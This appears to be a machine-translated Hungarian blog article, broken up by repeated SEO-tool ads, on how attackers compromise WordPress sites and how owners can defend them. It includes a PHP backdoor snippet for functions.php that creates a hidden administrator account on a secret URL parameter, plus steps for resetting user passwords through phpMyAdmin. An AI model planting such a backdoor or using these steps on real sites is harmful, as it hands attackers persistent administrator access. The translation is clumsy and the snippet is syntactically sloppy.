Intro
Mielőtt elkezdenénk ezt a cikket, szeretnénk, ha tudná, hogy a hackelés illegális, és mi nem ösztönözzük vagy bátorítjuk a rosszindulatú tevékenységeket. Ez a cikk kizárólag arra szolgál, hogy ismereteket szerezzünk arról, hogyan működnek a csalók, és hogy a webhely biztonságának változatos módszerei elengedhetetlenek ahhoz, hogy távol tartsuk őket. Beszéljük meg!
- Hogyan hackelik meg a csalók a WordPress-t?
- Hogyan védd meg WP oldaladat a csalóktól?
Szóval, minden további nélkül kezdjük a témát.
Hogyan Hack WordPress weboldal Online?
(Forrás: wpsecurityninja.com)
A WPScan használata:
AWPScan egy WP biztonsági szkenner, amely segít a webhelytulajdonosoknak ellenőrizni a WordPress webhelyük sebezhetőségét, de ezt a szkennert a hackerek is használják a webhelyek feltörésére irányuló indítékaik teljesítéséhez.
A WPScan lehetővé teszi a webhelyek tulajdonosai és rendszergazdái számára, hogy megadják a WP felhasználói fiókokat és a nyers erővel használt jelszavakat, és a WP fiókokhoz való jogosulatlan hozzáférés megszerzésének első lépése.
(Brute force felhasználónév és jelszó a WPScan segítségével. Forrás: Medium)
MIM-támadások:
A Man-in-middle (MIM) támadások könnyen végrehajthatók hasonló LAN-okat használó felhasználók esetében. A nem titkosított felhasználói bejelentkezések könnyű célpontot jelentenek, mivel minden részlet látható egyszerű szövegben.
Az ilyen típusú támadások végrehajtásában részt vevő szoftverek képesek kiszúrni a kompromittált témákat, bővítményeket, és képesek a felhasználók felsorolására.
(Forrás: Medium)
SQL Injections:
Az SQL-injekciós támadások a legjelentősebb támadások, amelyeket a weboldalakba való behatoláshoz használnak. Ezek a támadások a weboldal backend átjáróit célozzák, és lehetővé teszik a hackerek számára, hogy a kompromittált parancsok végrehajtásával behatoljanak ezekbe.
(Forrás: secure.wphackedhelp.com)
Az All-in-One platform a hatékony SEO-hoz
Minden sikeres vállalkozás mögött egy erős SEO kampány áll. De a számtalan optimalizálási eszköz és technika közül lehet választani, ezért nehéz lehet tudni, hol kezdjük. Nos, ne félj tovább, mert van egy ötletem, ami segíthet. Bemutatom a Ranktracker all-in-one platformot a hatékony SEO-ért.
Végre megnyitottuk a Ranktracker regisztrációt teljesen ingyenesen!
Ingyenes fiók létrehozásaVagy Jelentkezzen be a hitelesítő adatokkal
Ezek a behatolások lehetővé teszik a hackerek számára az adatbázisok és parancsok módosítását, valamint a webhelyinformációk törlését vagy ellopását is.
Mivel ezek az SQL-támadások kiszúrják a sebezhető és javítatlan oldalakat, megkönnyítik és sikeressé teszik a hackerfeladatot.
A My SQL/cPanel használata:
Ennél a módszernél a hackerek egy hamis fiókot hoznak létre, vagy módosítják a WP oldal jelenlegi felhasználójának jelszavát. A hackerek a cPanelen keresztül próbálnak behatolni a PhpMyAdmin megnyitásával. A _users végződésű táblázatot keresik, és megtalálják a felhasználót, akit módosítani szeretnének.
Ez lehetővé teszi számukra, hogy megváltoztassák annak a felhasználónak a hitelesítő adatait, akit meg akarnak hackelni. Lenyomozzák a felhasználót, és megváltoztatják a felhasználó jelszavát (a user_pass mezőből) az online MD5-generátor megnyitásával, és kicserélik azt a kívánt jelszóra, majd később a # gombra kattintanak.
(A felhasználónevek, a felhasználók kódolt jelszavai, e-mail azonosítóik stb. mind a wp_users adatbázis táblában vannak tárolva. Forrás: firstsiteguide.com)
A felhasználónevek, a felhasználók kódolt jelszavai, e-mail azonosítóik stb. mind a wp_users adatbázis táblában vannak tárolva.
Functions.php szerkesztése:
A hackerek a Functions.php fájl módosításához is hozzáférnek a cPanelhez. A Fájlkezelő feloldásával megkeresik az aktív téma mappáját. A public_html/wp_content/themes mappából követik a témát, és a functions.php-t szerkesztik a kompromittált kódjuk elhelyezésével. A hackelés már folyamatban van, mert a hackerek új fiókot hoztak létre. Ha ezzel végeztek, törlik a kompromittált kódot.
Új felhasználói fiók létrehozása FTP-n keresztül:
Általában az FTP-fiókok segítenek a webhelytulajdonosoknak létrehozni egy olyan könyvtárat a webhelyükön belül, amely lehetővé teszi, hogy bizonyos felhasználók a bejelentkezési adataikkal feltöltsék/letöltsék a fájljaikat.
Ezek a fájlok az interneten is megtekinthetők.
FTP-fiók létrehozása a webhelyen:
- Adja meg a kívánt adatokat
- Adja meg az új FTP-felhasználó felhasználónevét
- Adja meg a jelszót az FTP-n keresztül történő hozzáféréshez szükséges fiók kiosztásához.
- Adja meg a könyvtár nevét az FTP-n keresztül történő hozzáféréshez.
- Írja be a kívánt MB helyet, amelyet a mappának kíván adni.
- Később nyomja meg a "Create" gombot az új fiók létrehozásához.
Az FTP-n keresztül történő hozzáféréshez az új felhasználónak be kell töltenie az alábbi adatokat.
Cím / Host Name / Address: yourdomain.com vagy ftp.yourdomain.com Felhasználó / User: [email protected] Jelszó: Az FTP-fiókhoz rendelt jelszó.
Port: 21Nevezze meg a fájlok feltöltésére/letöltésére szolgáló mappát.
Az új felhasználónak olvasási és írási jogosultságai lesznek mind a kiválasztott könyvtárban, mind az abban található összes alkönyvtárban. Például, ha létrehozza az ügyfél felhasználót, és hozzáférést ad neki a / home / user / public_html könyvtárhoz.
Behatolás a hátsó ajtón keresztül:
A webhelyre való behatolás rosszindulatú módja a hátsó ajtón keresztül történik. Legyen szó akár egy csalóról, aki be akar férni a webhelyére, akár az áldozat felhasználóról, aki vissza akarja szerezni a hozzáférést a webhelyéhez a backdoor behatoláson keresztül, mindkettőjüknek követniük kell az alábbi lépéseket.
Az All-in-One platform a hatékony SEO-hoz
Minden sikeres vállalkozás mögött egy erős SEO kampány áll. De a számtalan optimalizálási eszköz és technika közül lehet választani, ezért nehéz lehet tudni, hol kezdjük. Nos, ne félj tovább, mert van egy ötletem, ami segíthet. Bemutatom a Ranktracker all-in-one platformot a hatékony SEO-ért.
Végre megnyitottuk a Ranktracker regisztrációt teljesen ingyenesen!
Ingyenes fiók létrehozásaVagy Jelentkezzen be a hitelesítő adatokkal
Azokban az esetekben, amikor egy új felhasználói fiókot hoznak létre FTP-n keresztül, vagy jelszó-visszaállítás történik, de ez nem adja meg a kívánt eredményt, a felhasználó hátsó ajtón keresztül akarja feltörni a webhelyét, és visszaszerezni az adminisztrátori hozzáférését.
Lépések a Backdoor létrehozásához:
- Nyissa meg a functions.php fájlt, és illessze be az alábbi kódot.
add_action('wp_head', 'wploop_backdoor');
function wploop_backdoor() {
If ($_GET['backdoor'] == 'knockknock') {
require('wp-includes/registration.php');
If (!username_exists('username')) {
$user_id = wp_create_user('name', 'pass');
$user = new WP_User($user_id);
$user->set_role('administrator');
}
}
}
?>
- Később mentse el a változtatásokat.
Crypto Jacking & Cryptocurrency Mining:
A kriptovaluták népszerűsége olyan új kiberfenyegetéseknek adott teret, mint a kriptodézsma, amelyet kriptovaluta-bányászati kártevőnek is neveznek.
A számítógépnek a felhasználó akarata és tudatossága ellenére történő elkobzását kriptodézsmának nevezik. A crypto-jacking malware esetében a csalók a rendszereket és hálózatokat veszélyeztető szoftveren keresztül szállított rosszindulatú malware-rel fertőzik meg a felhasználó számítógépét.
Adathalászat:
Az adathalászat olyan módszer, amelynek során a csalók a felhasználók érzékeny adatait (bejelentkezési adatok, szociális számlaszám, PIN-kód, hitelkártyaadatok stb.) úgy csalják ki, hogy jogi személynek adják ki magukat. Céljuk eléréséhez általában e-maileket használnak.
Példa: Az adathalász e-mailben rossz linket is elhelyezhet, és a felhasználókat valamilyen csalárd webhelyre irányíthatja, ahová rosszindulatú szoftvereket juttathat el.
Malware:
AWordPress biztonsági statisztikák szerint 4000 WP weboldal fertőződött meg rosszindulatú szoftverektől a hamis SEO pluginek miatt.
A csalóknak nincs szükségük forrásra a rosszindulatú programok terjesztéséhez. A SEO pluginek, a WP témák és sok más, az oldalon jelenlévő tényező motiválta a hackereket, hogy a közelmúltban megjelent WP-VCD malware-t használják.
Még az adathalász e-mailek is átjárók a rosszindulatú programok terjesztéséhez.
A hackerek mottója itt is ugyanaz, azaz a felhasználók érzékeny adatainak megszerzése a rendszerekbe való behatolással és az információk ellopásával.
WordPress Ransomware:
A WP ransomware esetében a hackerek rosszindulatú szoftverekkel blokkolják a felhasználók hozzáférését a rendszerekhez és hálózatokhoz. Ugyanezt a felhasználó a hacker által követelt váltságdíj megfizetésével tudja visszaállítani.
Példa: A Petya-támadás, amelynek során a hacker titkosítja a fájlokat és adatokat, és váltságdíjat követel a visszafejtő kulcs ellenében.
Cross-Site Scripting (XSS) támadás:
Az XSS-támadásokat a hackerek úgy hajtják végre, hogy rosszindulatú tartalmat juttatnak be a weboldalba, kihasználva ezzel a böngészőt. Ez a támadás lehetővé teszi a hacker számára, hogy adatokat lopjon a cookie-kból, módosítsa a webhely tartalmát, és elfoglalja a webhelyet érzékeny adatok megszerzése céljából.
Kattintáslopás:
A clickjacking során a hacker rosszindulatú kísérletet tesz egy gomb/link kompromittálására, és arra ösztönzi a felhasználót, hogy kattintson a kompromittált objektumra. Ez lehetővé teszi a hacker számára, hogy rosszindulatú parancsokat hajtson végre a felhasználó számára érzékeny adatokhoz való hozzáférés érdekében.
Spoofing:
A hamisítás olyan támadás, amelyben a személy megbízható személyazonosságnak álcázza magát, hogy illegális előnyökhöz jusson a felhasználóval szemben, és rávegye őt bizalmas információinak megadására.
Mindezen hackertámadások megelőzése érdekében speciális biztonsági intézkedéseket kell hozni a WP weboldalának védelme érdekében.
Hogyan védjük meg a WordPress weboldalt a hackertől?
(Forrás: envisagedigital.co.uk)
A fenti statisztikák elégségesek ahhoz, hogy jelezzék a WordPress népszerűségét. Ez a népszerűség teszi ezt a CMS-platformot kívánatosabbá a hackerek körében, akik változatos hackelési módszerekkel próbálkoznak, hogy hozzáférjenek a WP-weboldalakhoz és azok adataihoz.
Ezért fontos tudni, hogyan lehet megakadályozni, hogy a hackerek hozzáférjenek a WP webhelyéhez.
Biztosítsa WP webhelyét SSL-tanúsítvánnyal:
Amikor bármilyen adat betöltődik a webhelyre, az mindig egyszerű szövegben van, ami mindenki számára könnyen látható, beleértve a hackereket is. Ez kockázatos lehet, mivel a hackerek visszaélhetnek a webhely adataival.
Az SSL (Secure Socket Layers) tanúsítványok azok a digitális tanúsítványok, amelyek segítenek a WP webhelyének 256 bites titkosítási biztonsággal történő védelmében, így a webhely adatait kódolt formátumba alakítják át.
A hackerek nem tudják elolvasni a kódokat, noha hozzáférést szereztek az Ön webhelyéhez, és ezért kénytelenek elhagyni az ilyen webhelyeket.
(Forrás: clickssl.net)
Válassza ki a kívánt márkájú SSL tanúsítványt (Comodo, Thawte, RapidSSL, stb.) és telepítse azt a WP oldalára. Az SSL-tanúsítvány típusa esetén meg kell értenie a domaineket és az aldomaineket. Például, ha a WP webhelye aldomainekkel rendelkezik, akkor egyetlen olcsó Wildcard tanúsítvány, amely mindössze 45 $/évbe kerül, körülbelül 45 $/év, biztosíthatja az egész digitális vállalkozását.
Gyors kiállítás, 2048 bites titkosítás, SEO-növelés, webhely-megbízhatósági pecsét, 99%-os böngésző/mobil kompatibilitás, visszatérítési politika és garancia - ez csak néhány a Wildcard SSL tanúsítványok telepítésének jellemzői és előnyei közül.
Az SSL-termékek változatos márkái és lehetőségei, a költségvetés-barát árak és a kiváló ügyfélszolgálat csak néhány előnye annak, hogy a ClickSSL üzletet választja WP webhelyének biztosításához.
Frissítse az alkalmazottakat:
Az emberi hibák katasztrofálisak lehetnek, ezért mindig gondoskodjon arról, hogy alkalmazottai naprakészek legyenek a legújabb kiberfenyegetésekkel kapcsolatban, hogy elkerüljék a sebezhetőségüket.
Ha az Ön munkatársai már a kezdeti szakaszban nyomon tudják követni a feltört webhely gyanús jeleit, tájékoztathatják az érintetteket, és megakadályozhatják, hogy webhelye és vállalkozása további károkat szenvedjen.
Kétfaktoros hitelesítés (2FA) használata:
A 2FA bevezetése az oldalra történő bejelentkezés során a legfontosabb módja a nyers erővel végrehajtott támadások kivédésének. Amellett, hogy egy újabb biztonsági réteget adnak hozzá, a webhely és a felhasználó adatait is védik.
Ennek oka, hogy ha az egyik biztonsági réteg sérül, a csalónak a 2. rétegbe kell behatolnia, hogy hozzáférjen a weboldalhoz.
Ez egy nehéz döntés, és ezért az esetek többségében a csalók végül más, rosszul védett oldalakra térnek át.
Tipp: A WP 2FA egy ingyenes WP bővítmény, amely egy további biztonsági réteget ad a WP webhelyének.
Rendszeresen ellenőrizze a rendszergazdai felhasználókat:
Ez fontos a WP webhely biztonsága szempontjából. Győződjön meg róla, hogy rendszeresen auditálja admin felhasználóit, és ellenőrizze a hozzáféréseiket.
A biztonsági hiányosságok megelőzése érdekében gondoskodjon arról is, hogy a felhasználók és az alkalmazottak a feladataiknak megfelelően korlátozott hozzáféréssel rendelkezzenek.
Rendszeresen frissítse a WordPress magját:
Nem tudsz a WP Core-ról?
Hadd tájékoztassalak röviden, hogy a WP Core tartalmazza az összes alapvető alapfájlt, amely a WP működéséhez szükséges.
A WordPress.org-ról letöltött WP zip fájlban található fájlok listája
(Forrás: ithemes.com)
Ezeket az alapfájlokat rendszeresen frissíteni kell a biztonsági frissítések kiadása után, hogy az összes biztonsági rést befoltozzák.
WP témák és bővítmények letöltése megbízható forrásokból:
Ez kulcsfontosságú, mert a bővítmények fenyegetőek lehetnek, ha nem frissítik őket, vagy nem megbízható forrásból telepítik őket. Ingyenes/fizetett bővítmények használata esetén mindig ellenőrizze az alábbiakban felsorolt tényezőket, mint például:
- Felhasználói értékelések és vélemények
- Felhasználóbarátság
- Kompatibilitás
- Biztonság
- Megbízhatóság
(Forrás: torquemag.io)
Ugyanez a szabály vonatkozik a WP témák telepítésére is.
WP témák és bővítmények rendszeres frissítése:
Az elavult vagy lejárt WP témák és bővítmények mindig veszélyt jelentenek a WP webhelyére, mivel elveszítik a biztonsági szabványokat. Annak érdekében, hogy a hackerek ne használhassák az ilyen átjárókat rosszindulatú programok terjesztésére, hogy hozzáférjenek a webhelyhez, gondoskodjon a WP webhelyén használt témák és bővítmények rendszeres frissítéséről.
Ez segít a plugin megfelelő működésében és a WP legújabb verzióival való szinkronizálásban.
Tipp: A bővítmények oldalon megtekintheti az összes telepített bővítményt, és minden egyes bővítmény mellett egy linket, amely az "Automatikus frissítések engedélyezése" feliratot tartalmazza. Kapcsolja be az automatikus frissítésekhez.
Módos ítsa az alapértelmezett adminisztrátornevet:
A hackerek túl okosak, és az alapértelmezett admin név használatával könnyen behatolhatnak a WP oldaladra. Mindig előnyös az alapértelmezett admin felhasználónév módosítása, hogy megakadályozza a hackerek brute-force támadások végrehajtását a webhelyedhez való jogosulatlan hozzáférés megszerzéséhez.
Korlátozott hozzáférés biztosítása:
Soha ne adjon többet a szükségesnél, és ugyanez a szabály vonatkozik a felhasználók és az alkalmazottak webhely-hozzáférésének megadására is.
A hozzáférés-szabályozás a webhely- és adatbiztonság legfontosabb szabálya, mivel ez határozza meg, hogy ki férhet hozzá a webhelyhez és ki nem. A webhely biztonsága érdekében blokkolja a WP admin és más kritikus kódok és adatok összes bejáratát.
A korlátozott hozzáférés nem csak a termelékenységet javítja, hanem a rosszindulatú bejegyzésektől is védi webhelyét.
WordPress frissítés:
Ha a WordPress nincs frissítve, webhelyét a hackerek behatolásának veszélye fenyegeti.
A WordPress a piaci részesedés 37%-át uralja, és rendszeresen frissítéseket ad ki a biztonsági rések és hibák kijavítására. Ezek a frissítések új funkciókat és a meglévők javítását is tartalmazzák, amelyek hasznosak a webhely teljesítményének fokozásához.
Az All-in-One platform a hatékony SEO-hoz
Minden sikeres vállalkozás mögött egy erős SEO kampány áll. De a számtalan optimalizálási eszköz és technika közül lehet választani, ezért nehéz lehet tudni, hol kezdjük. Nos, ne félj tovább, mert van egy ötletem, ami segíthet. Bemutatom a Ranktracker all-in-one platformot a hatékony SEO-ért.
Végre megnyitottuk a Ranktracker regisztrációt teljesen ingyenesen!
Ingyenes fiók létrehozásaVagy Jelentkezzen be a hitelesítő adatokkal
(Forrás: wpbeginner.com)
Tartsa naprakészen WP webhelyét a robusztus biztonság érdekében.
Befejezés:
Használjon erős és összetett jelszavakat, és tartsa WP webhelyét, valamint a bővítményeket és témákat frissítve, hogy kijavítsa az összes biztonsági hiányosságot. Szánjon időt alkalmazottai oktatására, mivel ez mindig segít a katasztrófák megelőzésében.
Soha ne lazítson a biztonságon, és mindig biztosítsa, hogy a legjobb és megbízható biztonsági bővítményeket használja, hogy WP webhelyét biztonságban tartsa a kíváncsi szemektől. Ezen kívül, védje webhelyét SSL-lel, hogy növelje az ügyfelek bizalmát, az üzletet és a SEO-t.
Most, hogy már tisztában vagy azzal, hogyan működnek a hackerek, reméljük, hogy ez a cikk segít abban, hogy megakadályozd a hackerek behatolását a webhelyedre, és biztonságosan kezeld a WP webhelyedet.